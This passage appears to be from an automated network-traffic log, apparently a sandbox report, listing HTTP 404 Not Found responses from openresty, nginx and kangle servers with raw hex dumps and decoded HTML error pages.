                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 13:15:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wglKkYd8WMmpy7vQ8L2rxbNGVU1FbJVBLRd%2BqdmuFtWpsdST8LcQd7Zb%2B7f6yDmdDr3JwzrGrfeBTlevNKyYTHz2A6t2b0KrDYHhh44DEMcFrolyMX%2FTq3PnFFvKA9Y%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec3d3f06b704233-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1884&min_rtt=1884&rtt_var=942&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=558&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 38 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendl
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:16:09 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:16:12 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:16:14 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 13:16:17 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: kangle/3.5Date: Tue, 03 Dec 2024 13:08:02 GMTSet-Cookie: home_lang=cn; path=/Content-Type: text/html; charset=utf-8X-Cache: MISS from kangle web serverTransfer-Encoding: chunkedConnection: closeData Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 65 72 72 6f 72 5f 70 69 63 2e 70 6e 67 29 3b 7d 0d 0a 23 77 61 72 70 70 65 72 20 7b 77 69 64 74 68 3a 20 31 32 32 30 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 e5 be ae e8 bd af e9 9b 85 e9 bb 91 22 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 20 7b 7a 6f 6f 6d 3a 20 31 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 2c 20 2e 63 6c 65 61 72 66 69 78 3a 62 65 66 6f 72 65 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 20 30 3b 63 6f 6e 74 65 6e 74 3a 20 27 5c 30 30 32 30 27 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 69 63 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 34 30 34 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 7b 77 69 64 74 68 3a 20 36 35 38 70 78 3b 68 65 69 67 68 74 3a 20 36 34 31 70 78 3b 6d 61 72 67 69 6e 3a 20 34 34 70 78 20 61 75 74 6f 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 6d 62 33 37 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 37 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 39 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 39 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 5c 35 46 41 45 5c 38 46 36 46 5c 39 36 43 35 5c 39 45 44 31 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: kangle/3.5Date: Tue, 03 Dec 2024 13:08:04 GMTSet-Cookie: home_lang=cn; path=/Content-Type: text/html; charset=utf-8X-Cache: MISS from kangle web serverTransfer-Encoding: chunkedConnection: closeData Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 65 72 72 6f 72 5f 70 69 63 2e 70 6e 67 29 3b 7d 0d 0a 23 77 61 72 70 70 65 72 20 7b 77 69 64 74 68 3a 20 31 32 32 30 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 e5 be ae e8 bd af e9 9b 85 e9 bb 91 22 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 20 7b 7a 6f 6f 6d 3a 20 31 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 2c 20 2e 63 6c 65 61 72 66 69 78 3a 62 65 66 6f 72 65 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 20 30 3b 63 6f 6e 74 65 6e 74 3a 20 27 5c 30 30 32 30 27 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 69 63 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 34 30 34 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 7b 77 69 64 74 68 3a 20 36 35 38 70 78 3b 68 65 69 67 68 74 3a 20 36 34 31 70 78 3b 6d 61 72 67 69 6e 3a 20 34 34 70 78 20 61 75 74 6f 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 6d 62 33 37 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 37 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 39 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 39 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 5c 35 46 41 45 5c 38 46 36 46 5c 39 36 43 35 5c 39 45 44 31 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 65 72 72 6f 72 2d 70 61 67 65 2d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: kangle/3.5Date: Tue, 03 Dec 2024 13:08:07 GMTSet-Cookie: home_lang=cn; path=/Content-Type: text/html; charset=utf-8X-Cache: MISS from kangle web serverTransfer-Encoding: chunkedConnection: closeData Raw: 62 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 e9 a1 b5 e9 9d a2 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 2e 63 6f 6e 63 65 6e 74 65 72 2d 65 72 72 20 7b 77 69 64 74 68 3a 20 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 65 72 72 6f 72 5f 70 69 63 2e 70 6e 67 29 3b 7d 0d 0a 23 77 61 72 70 70 65 72 20 7b 77 69 64 74 68 3a 20 31 32 32 30 70 78 3b 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 20 62 6f 74 68 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 e5 be ae e8 bd af e9 9b 85 e9 bb 91 22 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 20 7b 7a 6f 6f 6d 3a 20 31 3b 7d 0d 0a 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 2c 20 2e 63 6c 65 61 72 66 69 78 3a 62 65 66 6f 72 65 20 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 68 65 69 67 68 74 3a 20 30 3b 63 6f 6e 74 65 6e 74 3a 20 27 5c 30 30 32 30 27 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 69 63 20 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 70 75 62 6c 69 63 2f 73 74 61 74 69 63 2f 65 72 72 70 61 67 65 2f 34 30 34 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 7b 77 69 64 74 68 3a 20 36 35 38 70 78 3b 68 65 69 67 68 74 3a 20 36 34 31 70 78 3b 6d 61 72 67 69 6e 3a 20 34 34 70 78 20 61 75 74 6f 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 6d 62 33 37 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 37 70 78 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 2d 74 78 74 20 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 33 39 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 39 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 5c 35 46 41 45 5c 38 46 36 46 5c 39 36 43 35 5c 39 45 44 31 3b 7d 0d 0a 2e 65 72 72 6f 72 2d 70 61 67 65 20 2e 